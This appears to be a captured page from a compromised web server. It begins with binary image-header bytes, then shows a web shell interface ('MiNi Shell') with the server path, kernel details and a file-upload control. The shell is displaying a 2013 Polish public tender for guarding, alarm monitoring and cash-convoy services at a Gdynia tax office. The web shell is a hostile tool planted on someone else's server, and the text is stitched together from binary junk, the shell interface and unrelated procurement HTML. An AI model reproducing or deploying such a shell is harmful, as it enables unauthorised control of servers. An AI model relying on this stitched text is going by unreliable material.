JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131014/417206-N-2013.html

<p class="kh_header"><b>Gdynia: Dotyczy postępowania na wykonywanie usług w zakresie ochrony osób, obiektu i mienia ( ochrona fizyczna), jak również monitoringu, konwoju środków płatniczych, konserwacji systemu sygnalizacji włamania i napadu w Drugim Urzędzie Skarbowym w Gdyni.</b><br>
<b>Numer ogłoszenia: 417206 - 2013; data zamieszczenia: 14.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Drugi Urząd Skarbowy w Gdyni , ul. Hutnicza 25, 81-061 Gdynia, tel. 0586634800 wewn. 131.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> is.gdansk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dotyczy postępowania na wykonywanie usług w zakresie ochrony osób, obiektu i mienia ( ochrona fizyczna), jak również monitoringu, konwoju środków płatniczych, konserwacji systemu sygnalizacji włamania i napadu w Drugim Urzędzie Skarbowym w Gdyni..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia publicznego są usługi w zakresie ochrony osób i mienia całodobowa ochrona fizyczna, monitoring-dozór sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urzadzeniach i systemach alarmowych, konwojowanie środków płatniczych, konserwacji systemu sygnalizacji włamania i napadu.Opis chronionego budynku: Budynek główny 5 kondygnacyjny, bez podpiwniczenia, dwuklatkowy, w którym znajdują sie pomieszczenia biurowo administracyjne, sanitarne, archiwa, pomieszczenia techniczne urzędu. Budynek posuada trzy wejścia, jedno główne. Powierzchnia pomiesczeń wynosi 3.665 m2. 4 budynki gospodarcze o łącxznej pow. 458m2, w których znajdują sie magazyny, pom. techniczne, garaże. Powierzchnia terenu wokół budynków wynosi ok. 3500 m2. Usługi ochrony maja spełniać następujące warunki: w okresie od 1 grudnia 2013 r. do 31 stycznia 2015 r. obiekt bedzie chroniony wewnętrz i na zewnątrz całodobowo (24 godz.) przez wszystkie dni tygodnia, niedziele, święta i inne wolne od pracy-przez jednego pracownika ochrony.Bezpośrednia ochrona fizyczna bedzie prowadzona przez pracownika ochrony posiadającego licencje pracownika ochrony fizycznej minimum pierwszego stopnia, posiadającego poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych o klauzuli /zastrzeżone/, wyposazonego w środki łączności bezprzewodowej-radiotelefony, a także środki przymusu bezpośredniego oraz uzbrojenie określone szczegółowo w Planie ochrony Drugiego Urzędu Skarbowego w Gdynia(w tym palalizatory-2szt, na którewymagane jest pozwolenie na broń-świadectwo broni). Ubiory pracowników obrony musza spełniać wymogi określone w ustawie z dnia 22 sierpnia 1997 r. o ochronie osób i mienia(t.j. Dz. U. z 2005 r.Nr 145, poz. 1221 z późn. zm.). Zamawiający nie dopuszca wykonywania usługi przez pracowników nielicencjonowanych.Podwykonawcom nie może zostać powierzona częśc zamówienia dotycząca stałej, całodobowej ochrony fizycznej. Usługi ochrony maja być prowadzone zgodnie z wymaganiami zawartymi w Planie ochrony Drugiego Urzędu Skarbowego w Gdyni. Zamawiający zaleca Wykonawcy dokonanie wizji lokalnej obiektu oraz zapoznanie się z wyciągiem planu ochrony Drugiego Urzędu Skarbowego w Gdyni, po uprzednim uzgodnieniu terminu z Zamawiającym. Warunkiem zapoznania się z wyciągiem będzie okazanie dokumentu uprawniającego do dostępu do informacji niejawnych, oznaczonych klauzulą /zastrzeżone/. Dokonanie wizji lokalnej nie jest obowiązkowe. Pracownikom Wykonawcy zostaną udostępnione techniczne urządzenia zabezpieczające obiekt Zamawiającego-system sygnalizacji włamania i napadu, system sygnalizacji pożaru. Do czynności wchodzących w skaład ochrony osób i mienia obiektu Drugiego Urzędu Skarbowego w Gdyni nalezy w szczególności:
1) strzeżenie przed kradzieżą, zniszczeniem lub uszkodzeniem mienia Drugiego Urzędu Skarbowego w Gdyni, 2) ustalenie uprawnień osób do przebywania w ochranianym obiekcie, 3) wezwanie osób do opuszczenia chronionego obiektu w przypadku stwierdzenia braku uprawnień do przebywania na jego terenie lub stwierdzenia zakłócenia porządku, 4) ujęcie osób stwarzających zagrożenie dla życia, zdrowia lub nietykalności osobistej, a także dla chronionego mienia, w celu niezwłocznego oddania tych osób Policji, 5) stosowanie środków przymusu bezpośredniego, o których mowa w art. 38 ust. 2 ustawy z dnia 22 sierpnia 1997 r.  o ochronie osób i mienia(t.j. Dz. U. z 2005 r.Nr 145, poz. 1221 z późn. zm.), w przypadku zagrożenia mienia powierzonego ochronie lub w przypadku konieczności odparcia ataku na pracownika ochrony, pracowników lub klientów Zamawiającego, 6) kontrola zamknięcia i zaplombowania pomiesczeń w chronionym obiekcie po godzinach pracy, 7) kontrola kluczy wydawanych pracownikom urzędu, 8) niezwłoczne powiadamianie Policji w przypadku ujawnienia jakichkolwiek sytuacji podejrzanej, zaistniałej na terenie chronionego obiektu, 9) wykonywanie zadań punktu ostrzegania i alarmowania pracowników urzędu (w razie zaistnienia zagrożeń), 10) zapewnienie bezpieczeństwa pracowników urzędu i interesantów, 11) koordynowanie działań ochrony w czasie zagrożenia, 12) wspomaganie akcji ewakuacyjnej na wypadek zagrożenia, 13) obserwacja osób wchodzących do urzędu, 14) obsługa urządzeń systemu sygnalizacji włamania i napadu oraz systemu sygnalizacji pożaru, 15) okresowe patrolowanie wnętrza obiektu  głównego oraz obiektów przyległych, 16) podejmowanie niezbędnych interwencji w celu przywrócenia porządku publicznego, przeciwdziałanie zamachom przestępczym, 17) sprawdzanie drożności dróg ewakuacyjnych, 18( współdziałanie ze służbami porządkowymi (ratowniczymi), 19) informowanie o wszystkich nieprawidłowościach, mających wpływ na obniżenie bezpieczeństwa obiektu Pełnomocnika ds. ochrony, 20) sprawdzanie zamknięcia drzwi wejściowych do obiektu, 21)sprawdzanie korytarzy i pomiesczeń ogólnodostepnych: a) czy nie pozostaja w obiekcie osoby nieuprawnione, b) czy nie pozostawiono przedmiotów budzących podejrzenie wybuchu, pożaru, c) czy nie występują objawy  awarii wodociągowej, elektrycznej lub grzewczej, 22) prowadzenie zgodnie z obowiązującymi przepisami dokumentacji ochronnej, 23) wykonywanie czynności zgodnie z wymaganiami zawartymi w Planie ochrony obiektu Drugiego Urzędu Skarbowego w Gdyni oraz przestrzeganie przepisów BHP, p.poż i innych wewnętrznych przepisów obowiązujących u Zleceniodawcy. Wymagania dotyczące monitoringu obiektu Drugiego Urzędu Skarbowego w Gdyni. Monitoring systemu alarmowego zainstalowanego w obiekcie Drugiego Urzędu Skarbowego w Gdyni polegał będzie na podłączeniu na koszt Wykonawcy centralek systeu sygnalizacji włamania i napadu Zamawiającego do stacji monitorowania Wykonawcy przy pomocy łącza sztywnego (na istniejących łączach telefonicznych) oraz specjalnego dadajnika GSM lub nadajnika radiowego oraz przesyłaniu do stacji monitorowania Wykonawcy następujących sygnałaów: 1) sygnalizacja rodzaju alarmu (włamanie, napad) z dokładną lokalizacja miejsca, 2) próby sabotażu, usterki systemowe i inne, 3) transmisji testowych (co 12 godzin). Wymagane jest dwutorowe monitorowanie systemu alarmowego, drogą telefoniczną oraz bezprzewodowo. Wymagana jest możliwość sporządzenia wydruku raportu zdarzeń z danego okresu. w przypadku stwierdzenia braku możliwości nadzoru lokalnego systemu alarmowego Wykonawca powiadamia Zamawiającego telefonicznie. zamawiający wymaga stałej całodobowej gotowości do odbioru sygnałów oraz w przypadku otzrymania sygnału o alarmie, natychmiastowego zmotoryzowanego patrolu interwencyjnego, który sprawdzi przyczyny włączenia sie alarmu oraz skontroluje prawidłowośc pełnienia służby przez zatrudnionych pracowników ochrony. Patrol interwencyjny musi składac sie z conajmniej dwóch licencjonowanych pracowników ochrony, uzbrojonych i wyposażonych w środki przymusu bezpośredniego oraz sprzęt łączności. czas dotarcia do obiektu Urzedu nie moze przekraczac 10 minut. Wymagania dotyczące konwojowania środków płatniczych. Konwojowanie środków płatniczych odbywac sie będzie transportem Wykonawcy, raz  dziennie oraz dorźnie na Zlecenie Zamawiającego z jednodniowym wyprzedzeniem, n atrasie pomiędzy siedzibą Zamawiającego a wskazana placówką bankowa na terenie Gdyni. Usługa będzie wykonywana w dni robocze w godzinach od 15.30 do 16.00 z wyjątkiem środy od godz. 18. do godz. 18.30. Dodatkowo Wykonawca, zgodnie z zapotrzebowaniem złoszonym przez Zamawiającego drogą telefoniczną z co najmniej 24 godzinnym wyprzedzeniem, z częstotliwością około 2-4 razy w miesiącu, będzie realizował zadanie konwojowe z udziałem upoważnionego pracownika Zamawiającego, na trasie pomiędzy siedzibą zamawiającego a wskazanymi dwiema placówkami banku (do wyboru przez zamawiającego) na terenie Gdyni. Transport środków płatniczych będzie wykonywany w opraciu o przepisy ustawy z dnia 22 sierpnia 1997 r.  o ochronie osób i mienia(t.j. Dz. U. z 2005 r.Nr 145, poz. 1221 z późn. zm.) oraz Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 7 września 2010 r. w sprawie wymagań jakim powinna odpowiedać ochrona wartości pieniężnych przechowywanych i transportowanych przez przedsiębiorców i inne jednostki organizacyjne (Dz. U. Nr 166, poz. 1128 z póxn. zm.). Wykonawca zobowiązuje sie do ochrony i zabezpieczenia konwojowanych środków płatniczych przed kradzieżą, rabunkiem, zniszczeniem i zaginięciem od chwili ich przejęcia do momentu przekazania ich w miejscu przeznaczenia.. Odpowiedzialność konwoju za konwojowanie do banku środków płatniczych ustaje z chwilą uzyskania potwierdzenia przyjęcia gotówki przez bank. Wykonawca ponosi pełną odpowiedzialność odszkodowawczą z tytułu niewykonania lub nienależytego wykonania obowiązkó wynikających z zaratej  umowy, w w sczególności utraty, zniszczenia lub uszkodzenia gotówki jak również z powodu kradzieży, rabuknu lub innego działania przestępczego. Wymagania dotyczące konserwacji systemu sygnalizacji włamania i napadu. Konserwację może przeprowadzić jedynie pracownik posiadający licencję pracownika zabezpieczenia technicznego pierwszego lub drugiego stopnia. W ramach konserwacji systemu sygnalizacji włamania i napadu Wykonawca zobowiązany jest do przeprowadzenia w obiekcie biurowym Zamawiającego, jeden raz na kwartał, przeglądu tego systemu i dokonania nastepujących zabiegów konserwacyjnych: 1) sprawdzenie instalacji, rozmiesczenia i zamocowania wszystkich urządzeń, a w szczególności czujek, 2) sprawdzenie linii dozorowych (równoważenie lini), wymuszanie działania, 3) sprawdzenie czy zasilanie główne i rezerwowe pracują i są sprawne, 4) sprawdzenie centrali i jej obsługi, 5) zmiany kodów zabezpieczających, 6) sprawdzenie czy system alarmowy jest całkowicie w stanie gotowości do pracy, 7) sprawdzenie poprawności działania transmisji alarmu przy współpracy ze stacja monitorowania, 8) utrzymanie w czystości urządzeń systemu alarmowego. Usługa dokonywania napraw w przypadku awarii lub stwierdzenia usterek obejmuje: 1) przegląd systemu w celu stwierdzenia przyczyny uszkodzenia, 2) zakup lub dostawa sprzętu i urządzeń w zakresie wymaganym dla dokonania naprawy, po zatwierdzeniu listy materiałów lub urządzeń przez przedstawiciela zamawiającego-wymagane jest przedstawienie kosztorysu wykonania całości prac, 3) dokonanie naprawy, 4) sprawdzenie po naprawie, czy system jest całkowicie w stanie gotowości do pracy. W przypadku wystąpienia uszkodzenia lub awarii systemu Wykonawca obowiązany jest usunąc usterki w czasie do 8 godzin od pozyskania informacji o uszkodzeniu lub awarii systemu. Wykonawca będzie przeprowadzał przeglądy instalacji systemu sygnalizacji włamania i napadu jeden raz na kwartał w terminie uzgodnionym z Zamawiającym. Z przeprowadzenia przeglądu Wykonawca przedłoży Zamawiającemu protokół zawierający informacje, zgodnie z Załącznikiem Nr 7 do niniejszej specyfikacji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 79.71.50.00-9, 50.80.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania niniejszego zamówienia wymaga posiadania koncesji wydanej przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej 
w zakresie usług ochrony osób i mienia realizowanych w formie bezpośredniej ochrony fizycznej oraz zabezpieczenia technicznego.
Wykonawca dołączy aktualna koncesję.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że zrealizował lub realizuje w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) przed upływem terminu składania ofert, co najmniej trzy usługi zbliżone swoim zakresem do przedmiotu niniejszego zamówienia, potwierdzone wiarygodnymi dokumentami (referencjami), że zostały one wykonane należycie.
Każda z usług wykazanych w wykazie musi spełniać łącznie następujące warunki:
- była lub jest świadczona w obiektach administracji rządowej lub samorządowej, bankach, obiektach sektora prywatnego o charakterze administracyjno- biurowym (to jest w budynkach przeznaczonych na biura), 
w których znajduje się sprzęt biurowy a także dokumentacja w formie zarówno papierowej jak i zawartej 
na elektronicznych nośnikach danych, zawierająca informacje objęte ochroną danych osobowych, 
wraz z pomieszczeniami przynależnymi, takimi jak: pomieszczenia sanitarne, techniczne, korytarze itp., 
- była świadczona przez okres nie krótszy niż 10 miesięcy do dnia składania ofert,
- okres wykonywania usługi wynikającej z kontraktu jest nie krótszy niż 12 miesięcy,
- roczna wartość brutto kontraktu wynosi co najmniej 250.000,00 PLN.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w oparciu o złożone przez Wykowawę oświadczenie według wzoru na Załączniku Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w oparciu o złożone przez Wykowawę oświadczenie według wzoru na Załączniku Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w oparciu o złożone przez Wykowawę oświadczenie według wzoru na Załączniku Nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) dokument okreslający zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje Pełnomocnik-także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy, 2) wykaz części zamówienia (zakres usług), których wykonanie Wykonawcy powierzy podwykonawcą, wg wzoru na Załączniku Nr 4 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie zawodowe oraz jakość świadczonych usług - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian zawartej umowy:1) w przypadku, gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację zamówienia, 2) w przypadku, gdy nastąpi zmiana nazwy lub siedziby, zmiany osobowe, teleadresowe Wykonawcy lub Zamawiającego, 3) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego, np. zmiana godzin urzędowania, częstotliwości świadczenia usługi, 4) z powodu okoliczności siły wyższej, w szczególności zagrażającej bezpośrednio życiu lub zdrowiu ludzi lub grożącej powstaniem szkody w znacznych rozmiarach, 5) zmiana podmiotu, który zobowiązał się do oddania Wykonawcy do dyspozycji niezbędnych zasobów w celu realizacji niniejszego zamówienia, pod warunkiem, że Wykonawca przedstawi zobowiązanie nowego podmiotu przed upływem ważności poprzedniego zobowiązania, 6)wprowadzenie lub zmiana Podwykonawcy w przypadku choroby, śmierci (w odniesieniu do osób fizycznych) lub innych zdarzeń losowych niezależnych od Zamawiającego / Wykonawcy (np. rezygnacja), a także nie wywiązanie się z obowiązków wynikających z przepisów. Strona występująca o zmianę postanowień umowy zobowiązana jest do udokumentowania zaistnienia okoliczności. Wniosek o zmianę postanowień umowy musi być wyrażony na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
